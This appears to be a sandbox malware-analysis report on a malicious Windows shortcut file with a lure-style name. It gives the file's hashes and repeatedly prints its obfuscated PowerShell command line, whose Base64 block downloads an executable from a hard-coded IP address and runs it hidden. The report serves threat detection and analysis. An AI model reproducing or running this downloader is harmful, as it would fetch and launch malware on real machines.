Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
dc733f068184e3adba0100f33a8ee55a
Sha1
eb11ef784534e1b729f551e475904ef29080325f
Sha256
292ef9c837eb247376d40aec091bac4b2ca4195d15614895cc4629d4b62d4604
Sha384
9a5e5eebeebe1b879f480cff035eb37c3825144908588a2232366a6534e1d1de07044a9795b70c96569ceaac3ef92161
Sha512
142ad755e169c2452b802ac706d0be37e4f66290ffd66c32bbb3bb3ab0f5e6fec0b03218b7b13ddd20d3e71de6fb66e52e07fb335c1cbc7960e66247b4b5c2ff
SSDeep
48:8WfJhs/qCD4npTX46to/A3gm0lO9pIiLxKpKTai6:8y83EeA3ylO9pjng
TLSH
7851102516F20218E2B2AB3568F97615CDB3BD26ED35AE4E014C07851B23A00DE24F3F
File Structure
oustanding!$&()blance500%&00$&09finalrevised.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Base64-Block]
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==')));
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
oustanding!$&()blance500%&00$&09finalrevised.lnk (3.16 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙